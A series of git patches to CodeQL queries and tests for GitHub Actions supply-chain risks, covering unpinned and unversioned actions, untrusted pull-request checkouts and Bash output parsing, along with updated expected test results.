df0c1e28e713c83b2a29f97bc6aaa6fa199c1c0e Mon Sep 17 00:00:00 2001 From: Kylie Stradley <4666485+KyFaSt@users.noreply.github.com> Date: Wed, 23 Oct 2024 21:49:43 -0400 Subject: [PATCH 0627/1267] stub out qlhelp --- .../Security/CWE-829/UnversionedImmutableAction.md | 14 ++++++++------ 1 file changed, 8 insertions(+), 6 deletions(-) diff --git a/ql/src/Security/CWE-829/UnversionedImmutableAction.md b/ql/src/Security/CWE-829/UnversionedImmutableAction.md index eab708f8602..754fe75b62b 100644 --- a/ql/src/Security/CWE-829/UnversionedImmutableAction.md +++ b/ql/src/Security/CWE-829/UnversionedImmutableAction.md @@ -1,27 +1,29 @@ -# Unpinned tag for 3rd party Action in workflow +# Unversioned Immutable Action ## Description -Using a tag for a 3rd party Action that is not pinned to a commit can lead to executing an untrusted Action through a supply chain attack. +Using an immutable action without indicating proper semantic version will result in the version being resolved to a tag that is mutable. This means the action code can between runs and without the user's knowledge. Using an immutable action with proper semantic versioning will resolve to the exact version +of the action stored in the GitHub package registry. The action code will not change between runs. ## Recommendations -Pinning an action to a full length commit SHA is currently the only way to use an action as an immutable release. Pinning to a particular SHA helps mitigate the risk of a bad actor adding a backdoor to the action's repository, as they would need to generate a SHA-1 collision for a valid Git object payload. When selecting a SHA, you should verify it is from the action's repository and not a repository fork. +When using [immutable actions]() use the full semantic version of the action. This will ensure that the action is resolved to the exact version stored in the GitHub package registry. This will prevent the action code from changing between runs. ## Examples ### Incorrect Usage ```yaml -- uses: tj-actions/changed-files@v44 +- uses: actions/checkout@some-tag +- uses: actions/checkout@2.x.x ``` ### Correct Usage ```yaml -- uses: tj-actions/changed-files@c65cd883420fd2eb864698a825fc4162dd94482c # v44 +- uses: actions/checkout@4.0.0 ``` ## References -- [Using third-party actions](https://docs.github.com/en/actions/security-for-github-actions/security-guides/security-hardening-for-github-actions#using-third-party-actions) +- [Consuming immutable actions]() From f7162228012cb27341f759c9d05fdeb3c554bba0 Mon Sep 17 00:00:00 2001 From: Kylie Stradley <4666485+KyFaSt@users.noreply.github.com> Date: Thu, 24 Oct 2024 16:27:53 -0400 Subject: [PATCH 0628/1267] remove octokit from trusted orgs for now - reduce PR scope --- ql/src/Security/CWE-829/UnpinnedActionsTag.ql | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql index 2111cc118a9..10c21bc368b 100644 --- a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql +++ b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql @@ -18,7 +18,7 @@ private predicate isPinnedCommit(string version) { version.regexpMatch("^[A-Fa-f bindingset[repo] private predicate isTrustedOrg(string repo) { - exists(string org | org in ["actions", "github", "advanced-security", "octokit"] | repo.matches(org + "/%")) + exists(string org | org in ["actions", "github", "advanced-security"] | repo.matches(org + "/%")) } from UsesStep uses, string repo, string version, Workflow workflow, string name From 030c08e5aee4f5138dc8b9bd670fe3afd7fb1019 Mon Sep 17 00:00:00 2001 From: Kylie Stradley <4666485+KyFaSt@users.noreply.github.com> Date: Thu, 24 Oct 2024 16:54:27 -0400 Subject: [PATCH 0629/1267] update expected from example originating from main branch merge --- .../Security/CWE-829/UnversionedImmutableAction.expected | 1 + 1 file changed, 1 insertion(+) diff --git a/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected b/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected index df23709b542..6d30e6f4cbe 100644 --- a/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected +++ b/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected @@ -20,3 +20,4 @@ | .github/workflows/test14.yml:105:7:111:4 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/test14.yml:105:7:111:4 | Uses Step | actions/checkout | | .github/workflows/test15.yml:60:7:65:4 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/test15.yml:60:7:65:4 | Uses Step | actions/checkout | | .github/workflows/test15.yml:110:7:115:4 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/test15.yml:110:7:115:4 | Uses Step | actions/checkout | +| .github/workflows/test22.yml:57:15:62:12 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/test22.yml:57:15:62:12 | Uses Step | actions/checkout | From 40ec9d623d71afedc0cd0bdd64be30d987790bfe Mon Sep 17 00:00:00 2001 From: Kylie Stradley <4666485+KyFaSt@users.noreply.github.com> Date: Thu, 24 Oct 2024 16:55:44 -0400 Subject: [PATCH 0630/1267] update existing tests to accomdate for trips from octokit2 example added to support unversioned immutable action ql --- .../Security/CWE-829/UnpinnedActionsTag.expected | 3 +++ .../Security/CWE-829/UntrustedCheckoutCritical.expected | 6 ++++++ .../Security/CWE-829/UntrustedCheckoutHigh.expected | 1 + 3 files changed, 10 insertions(+) diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index 0457fd7afaa..aa19c08f2f0 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected @@ -10,6 +10,9 @@ | .github/workflows/issue_comment_3rd_party_action.yml:14:15:14:52 | xt0rted/pull-request-comment-branch@v2 | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | Uses Step: comment-branch | | .github/workflows/issue_comment_3rd_party_action.yml:27:15:27:52 | xt0rted/pull-request-comment-branch@v2 | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | Uses Step: comment-branch | | .github/workflows/issue_comment_3rd_party_action.yml:41:15:41:42 | eficode/resolve-pr-refs@main | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'eficode/resolve-pr-refs' with ref 'main', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:39:9:45:6 | Uses Step: refs | Uses Step: refs | +| .github/workflows/issue_comment_octokit2.yml:13:15:13:41 | octokit/request-action@v2.x | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit2.yml:12:9:19:6 | Uses Step: fetch_issue | Uses Step: fetch_issue | +| .github/workflows/issue_comment_octokit2.yml:20:15:20:43 | octokit/request-action@v2.x.x | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x.x', not a pinned commit hash | .github/workflows/issue_comment_octokit2.yml:19:9:26:6 | Uses Step: fetch_pr | Uses Step: fetch_pr | +| .github/workflows/issue_comment_octokit2.yml:34:15:34:42 | some-action/some-repo@latest | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'some-action/some-repo' with ref 'latest', not a pinned commit hash | .github/workflows/issue_comment_octokit2.yml:33:9:37:6 | Uses Step | Uses Step | | .github/workflows/issue_comment_octokit.yml:13:15:13:41 | octokit/request-action@v2.x | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Uses Step: fetch_issue | | .github/workflows/issue_comment_octokit.yml:20:15:20:41 | octokit/request-action@v2.x | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Uses Step: fetch_pr | | .github/workflows/issue_comment_octokit.yml:104:15:104:43 | octokit/request-action@v2.0.2 | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.0.2', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Uses Step: request | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 3b2e5eb9de8..d36340d6bcc 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -93,6 +93,12 @@ edges | .github/workflows/issue_comment_heuristic.yml:11:9:24:6 | Uses Step: get-pr-info | .github/workflows/issue_comment_heuristic.yml:24:9:28:6 | Run Step: get-sha | | .github/workflows/issue_comment_heuristic.yml:24:9:28:6 | Run Step: get-sha | .github/workflows/issue_comment_heuristic.yml:28:9:33:2 | Uses Step | | .github/workflows/issue_comment_heuristic.yml:37:7:48:4 | Run Step: vars | .github/workflows/issue_comment_heuristic.yml:48:7:50:46 | Uses Step | +| .github/workflows/issue_comment_octokit2.yml:12:9:19:6 | Uses Step: fetch_issue | .github/workflows/issue_comment_octokit2.yml:19:9:26:6 | Uses Step: fetch_pr | +| .github/workflows/issue_comment_octokit2.yml:19:9:26:6 | Uses Step: fetch_pr | .github/workflows/issue_comment_octokit2.yml:26:9:27:6 | name: C ... ildcard | +| .github/workflows/issue_comment_octokit2.yml:26:9:27:6 | name: C ... ildcard | .github/workflows/issue_comment_octokit2.yml:27:9:31:6 | Uses Step | +| .github/workflows/issue_comment_octokit2.yml:27:9:31:6 | Uses Step | .github/workflows/issue_comment_octokit2.yml:31:9:33:6 | Uses Step | +| .github/workflows/issue_comment_octokit2.yml:31:9:33:6 | Uses Step | .github/workflows/issue_comment_octokit2.yml:33:9:37:6 | Uses Step | +| .github/workflows/issue_comment_octokit2.yml:33:9:37:6 | Uses Step | .github/workflows/issue_comment_octokit2.yml:37:9:38:37 | Uses Step | | .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | | .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | .github/workflows/issue_comment_octokit.yml:26:9:30:6 | Uses Step | | .github/workflows/issue_comment_octokit.yml:26:9:30:6 | Uses Step | .github/workflows/issue_comment_octokit.yml:30:9:35:2 | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected index 1d6122b3747..8e3ecaee547 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected @@ -5,6 +5,7 @@ | .github/workflows/issue_comment_direct.yml:43:9:46:126 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/issue_comment_heuristic.yml:28:9:33:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/issue_comment_heuristic.yml:48:7:50:46 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/issue_comment_octokit2.yml:27:9:31:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/issue_comment_octokit.yml:26:9:30:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/issue_comment_octokit.yml:30:9:35:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/issue_comment_octokit.yml:57:9:62:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | From 6802cd2398adf5f5b90b889c5575ff60d2237eda Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 25 Oct 2024 10:25:18 +0200 Subject: [PATCH 0631/1267] Improve checkout trigger events checks --- .../security/UntrustedCheckoutQuery.qll | 56 ++++++++----------- .../CWE-829/UntrustedCheckoutCritical.ql | 1 + .../Security/CWE-829/UntrustedCheckoutHigh.ql | 1 + 3 files changed, 25 insertions(+), 33 deletions(-) diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index 01da214b6ea..ffbb6fac263 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -13,7 +13,7 @@ string checkoutTriggers() { */ private module ActionsMutableRefCheckoutConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { - source.asExpr().getATriggerEvent().getName() = checkoutTriggers() and + //source.asExpr().getATriggerEvent().getName() = checkoutTriggers() and ( // remote flow sources source instanceof ArtifactSource @@ -209,29 +209,24 @@ abstract class SHACheckoutStep extends PRHeadCheckoutStep { } class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesStep { ActionsMutableRefCheckout() { this.getCallee() = "actions/checkout" and + //this.getEnclosingJob().getATriggerEvent().getName() = checkoutTriggers() and ( exists( ActionsMutableRefCheckoutFlow::PathNode source, ActionsMutableRefCheckoutFlow::PathNode sink | ActionsMutableRefCheckoutFlow::flowPath(source, sink) and - sink.getNode().asExpr() = this.getArgumentExpr(["ref", "repository"]) + this.getArgumentExpr(["ref", "repository"]) = sink.getNode().asExpr() ) or // heuristic base on the step id and field name - exists(string value | - this.getArgumentExpr("ref") - .(SimpleReferenceExpression) - .getEnclosingJob() - .getATriggerEvent() - .getName() = checkoutTriggers() and - value.regexpMatch(".*(head|branch|ref).*") + exists(string value, Expression expr | + value.regexpMatch(".*(head|branch|ref).*") and expr = this.getArgumentExpr("ref") | - this.getArgumentExpr("ref").(StepsExpression).getStepId() = value or - this.getArgumentExpr("ref").(StepsExpression).getFieldName() = value or - this.getArgumentExpr("ref").(NeedsExpression).getNeededJobId() = value or - this.getArgumentExpr("ref").(NeedsExpression).getFieldName() = value or - this.getArgumentExpr("ref").(JsonReferenceExpression).getAccessPath() = value or - this.getArgumentExpr("ref").(JsonReferenceExpression).getInnerExpression() = value + expr.(StepsExpression).getStepId() = value or + expr.(SimpleReferenceExpression).getFieldName() = value or + expr.(NeedsExpression).getNeededJobId() = value or + expr.(JsonReferenceExpression).getAccessPath() = value or + expr.(JsonReferenceExpression).getInnerExpression() = value ) ) } @@ -247,27 +242,22 @@ class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesSt class ActionsSHACheckout extends SHACheckoutStep instanceof UsesStep { ActionsSHACheckout() { this.getCallee() = "actions/checkout" and + //this.getEnclosingJob().getATriggerEvent().getName() = checkoutTriggers() and ( exists(ActionsSHACheckoutFlow::PathNode source, ActionsSHACheckoutFlow::PathNode sink | ActionsSHACheckoutFlow::flowPath(source, sink) and - sink.getNode().asExpr() = this.getArgumentExpr(["ref", "repository"]) + this.getArgumentExpr(["ref", "repository"]) = sink.getNode().asExpr() ) or // heuristic base on the step id and field name - exists(string value | - this.getArgumentExpr("ref") - .(SimpleReferenceExpression) - .getEnclosingJob() - .getATriggerEvent() - .getName() = checkoutTriggers() and - value.regexpMatch(".*(head|sha|commit).*") + exists(string value, Expression expr | + value.regexpMatch(".*(head|sha|commit).*") and expr = this.getArgumentExpr("ref") | - this.getArgumentExpr("ref").(StepsExpression).getStepId() = value or - this.getArgumentExpr("ref").(StepsExpression).getFieldName() = value or - this.getArgumentExpr("ref").(NeedsExpression).getNeededJobId() = value or - this.getArgumentExpr("ref").(NeedsExpression).getFieldName() = value or - this.getArgumentExpr("ref").(JsonReferenceExpression).getAccessPath() = value or - this.getArgumentExpr("ref").(JsonReferenceExpression).getInnerExpression() = value + expr.(StepsExpression).getStepId() = value or + expr.(SimpleReferenceExpression).getFieldName() = value or + expr.(NeedsExpression).getNeededJobId() = value or + expr.(JsonReferenceExpression).getAccessPath() = value or + expr.(JsonReferenceExpression).getInnerExpression() = value ) ) } @@ -283,7 +273,7 @@ class ActionsSHACheckout extends SHACheckoutStep instanceof UsesStep { class GitMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { GitMutableRefCheckout() { exists(string cmd | this.getScript().getACommand() = cmd | - this.getATriggerEvent().getName() = checkoutTriggers() and + //this.getATriggerEvent().getName() = checkoutTriggers() and cmd.regexpMatch("git\\s+(fetch|pull).*") and ( (containsHeadRef(cmd) or containsPullRequestNumber(cmd)) @@ -307,7 +297,7 @@ class GitMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { class GitSHACheckout extends SHACheckoutStep instanceof Run { GitSHACheckout() { exists(string cmd | this.getScript().getACommand() = cmd | - this.getATriggerEvent().getName() = checkoutTriggers() and + //this.getATriggerEvent().getName() = checkoutTriggers() and cmd.regexpMatch("git\\s+(fetch|pull).*") and ( containsHeadSHA(cmd) @@ -328,7 +318,7 @@ class GitSHACheckout extends SHACheckoutStep instanceof Run { class GhMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { GhMutableRefCheckout() { exists(string cmd | this.getScript().getACommand() = cmd | - this.getATriggerEvent().getName() = checkoutTriggers() and + //this.getATriggerEvent().getName() = checkoutTriggers() and cmd.regexpMatch(".*(gh|hub)\\s+pr\\s+checkout.*") and ( (containsHeadRef(cmd) or containsPullRequestNumber(cmd)) @@ -351,7 +341,7 @@ class GhMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { class GhSHACheckout extends SHACheckoutStep instanceof Run { GhSHACheckout() { exists(string cmd | this.getScript().getACommand() = cmd | - this.getATriggerEvent().getName() = checkoutTriggers() and + //this.getATriggerEvent().getName() = checkoutTriggers() and cmd.regexpMatch("gh\\s+pr\\s+checkout.*") and ( containsHeadSHA(cmd) diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql index be3b02ae477..07602af0ac4 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql @@ -48,6 +48,7 @@ where // the checkout occurs in a privileged context inPrivilegedContext(poisonable, event) and inPrivilegedContext(checkout, event) and + event.getName() = checkoutTriggers() and not exists(ControlCheck check | check.protects(checkout, event, "untrusted-checkout")) and not exists(ControlCheck check | check.protects(poisonable, event, "untrusted-checkout")) select poisonable, checkout, poisonable, diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql index e130ba5dbb8..39cd1860097 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql @@ -24,6 +24,7 @@ where not checkout.getAFollowingStep() instanceof PoisonableStep and // the checkout occurs in a privileged context inPrivilegedContext(checkout, event) and + event.getName() = checkoutTriggers() and ( // issue_comment: check for date comparison checks and actor/access control checks event.getName() = "issue_comment" and From d8f79818d6ffd1f572bf1a88bad78124785acd3d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 25 Oct 2024 10:25:47 +0200 Subject: [PATCH 0632/1267] Improve extraction of Output/Env assignments --- ql/lib/codeql/actions/Bash.qll | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/ql/lib/codeql/actions/Bash.qll b/ql/lib/codeql/actions/Bash.qll index c1e038069eb..fda27732828 100644 --- a/ql/lib/codeql/actions/Bash.qll +++ b/ql/lib/codeql/actions/Bash.qll @@ -256,20 +256,20 @@ class BashShellScript extends ShellScript { override predicate getAWriteToGitHubEnv(string name, string data) { exists(string raw | - Bash::extractFileWrite(this.getRawScript(), "GITHUB_ENV", raw) and + Bash::extractFileWrite(this, "GITHUB_ENV", raw) and Bash::extractVariableAndValue(raw, name, data) ) } override predicate getAWriteToGitHubOutput(string name, string data) { exists(string raw | - Bash::extractFileWrite(this.getRawScript(), "GITHUB_OUTPUT", raw) and + Bash::extractFileWrite(this, "GITHUB_OUTPUT", raw) and Bash::extractVariableAndValue(raw, name, data) ) } override predicate getAWriteToGitHubPath(string data) { - Bash::extractFileWrite(this.getRawScript(), "GITHUB_PATH", data) + Bash::extractFileWrite(this, "GITHUB_PATH", data) } override predicate getAnEnvReachingGitHubOutputWrite(string var, string output_field) { @@ -542,12 +542,12 @@ module Bash { blockFileWrite(script, cmd, file, content, filters) } - bindingset[script, file_var] - predicate extractFileWrite(string script, string file_var, string content) { + bindingset[file_var] + predicate extractFileWrite(BashShellScript script, string file_var, string content) { // single line assignment exists(string file_expr, string raw_content | isParameterExpansion(file_expr, file_var, _, _) and - singleLineFileWrite(script.splitAt("\n"), _, file_expr, raw_content, _) and + singleLineFileWrite(script.getAStmt(), _, file_expr, raw_content, _) and content = trimQuotes(raw_content) ) or @@ -566,12 +566,12 @@ module Bash { cmd = "add-path" and content = value ) and - singleLineWorkflowCmd(script.splitAt("\n"), cmd, key, value) + singleLineWorkflowCmd(script.getAStmt(), cmd, key, value) ) or // multiline assignment exists(string file_expr, string raw_content | - multiLineFileWrite(script, _, file_expr, raw_content, _) and + multiLineFileWrite(script.getRawScript(), _, file_expr, raw_content, _) and isParameterExpansion(file_expr, file_var, _, _) and content = trimQuotes(raw_content) ) From 922ae57abaf8b68e4995c942aa7ef15796f66044 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 25 Oct 2024 10:26:47 +0200 Subject: [PATCH 0633/1267] Fix LabelIf ControlCheck so that it recognizes checks not at the beginning of the expression --- ql/lib/codeql/actions/security/ControlChecks.qll | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index c73b06ae530..a24fd44b865 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll @@ -165,7 +165,7 @@ class LabelIfCheck extends LabelCheck instanceof If { condition = normalizeExpr(this.getCondition()) and ( // eg: contains(github.event.pull_request.labels.*.name, 'safe to test') - condition.regexpMatch("(^|[^!])contains\\(\\s*github\\.event\\.pull_request\\.labels\\b.*") + condition.regexpMatch(".*(^|[^!])contains\\(\\s*github\\.event\\.pull_request\\.labels\\b.*") or // eg: github.event.label.name == 'safe to test' condition.regexpMatch(".*\\bgithub\\.event\\.label\\.name\\s*==.*") From e6e170402169663b894a77c02b2d1585b134a12e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 25 Oct 2024 10:26:51 +0200 Subject: [PATCH 0634/1267] Update tests --- ql/test/library-tests/test.expected | 1741 ++++++++++++++++- ql/test/library-tests/test.ql | 55 - .../.github/workflows/resolve-args.yml | 36 + .../CWE-829/.github/workflows/test26.yml | 22 + .../CWE-829/.github/workflows/test27.yml | 22 + .../CWE-829/.github/workflows/test28.yml | 20 + .../UntrustedCheckoutCritical.expected | 10 +- .../CWE-829/UntrustedCheckoutMedium.expected | 3 + 8 files changed, 1849 insertions(+), 60 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/resolve-args.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test26.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test27.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test28.yml diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index e2fb80df77f..8d3e4193c69 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -1,2 +1,1739 @@ -ERROR: Ast::ShellScript is incompatible with string (test.ql:24,66-67) -ERROR: getCallee() cannot be resolved for type DataFlowPublic::CallNode (test.ql:62,79-88) +files +| .github/workflows/commands.yml:0:0:0:0 | .github/workflows/commands.yml | +| .github/workflows/expression_nodes.yml:0:0:0:0 | .github/workflows/expression_nodes.yml | +| .github/workflows/multiline2.yml:0:0:0:0 | .github/workflows/multiline2.yml | +| .github/workflows/multiline.yml:0:0:0:0 | .github/workflows/multiline.yml | +| .github/workflows/poisonable_steps.yml:0:0:0:0 | .github/workflows/poisonable_steps.yml | +| .github/workflows/shell.yml:0:0:0:0 | .github/workflows/shell.yml | +| .github/workflows/test.yml:0:0:0:0 | .github/workflows/test.yml | +workflows +| .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/test.yml:1:1:40:53 | on: push | +reusableWorkflows +compositeActions +jobs +| .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/shell.yml:5:5:9:2 | Job: job1 | +| .github/workflows/shell.yml:10:5:14:2 | Job: job2 | +| .github/workflows/shell.yml:15:5:19:2 | Job: job3 | +| .github/workflows/shell.yml:20:5:22:32 | Job: job4 | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | +localJobs +| .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/shell.yml:5:5:9:2 | Job: job1 | +| .github/workflows/shell.yml:10:5:14:2 | Job: job2 | +| .github/workflows/shell.yml:15:5:19:2 | Job: job3 | +| .github/workflows/shell.yml:20:5:22:32 | Job: job4 | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | +extJobs +steps +| .github/workflows/commands.yml:15:9:18:6 | Run Step | +| .github/workflows/commands.yml:18:9:20:6 | Run Step | +| .github/workflows/commands.yml:20:9:22:6 | Run Step | +| .github/workflows/commands.yml:22:9:24:6 | Run Step | +| .github/workflows/commands.yml:24:9:26:6 | Run Step | +| .github/workflows/commands.yml:26:9:28:6 | Run Step | +| .github/workflows/commands.yml:28:9:31:2 | Run Step | +| .github/workflows/commands.yml:34:9:37:6 | Run Step | +| .github/workflows/commands.yml:37:9:39:30 | Run Step | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | +| .github/workflows/multiline2.yml:15:9:20:6 | Run Step | +| .github/workflows/multiline2.yml:20:9:24:6 | Run Step | +| .github/workflows/multiline2.yml:24:9:30:6 | Run Step | +| .github/workflows/multiline2.yml:30:9:34:6 | Run Step | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline2.yml:71:9:78:6 | Run Step | +| .github/workflows/multiline2.yml:78:9:85:6 | Run Step | +| .github/workflows/multiline2.yml:85:9:89:35 | Run Step | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | +| 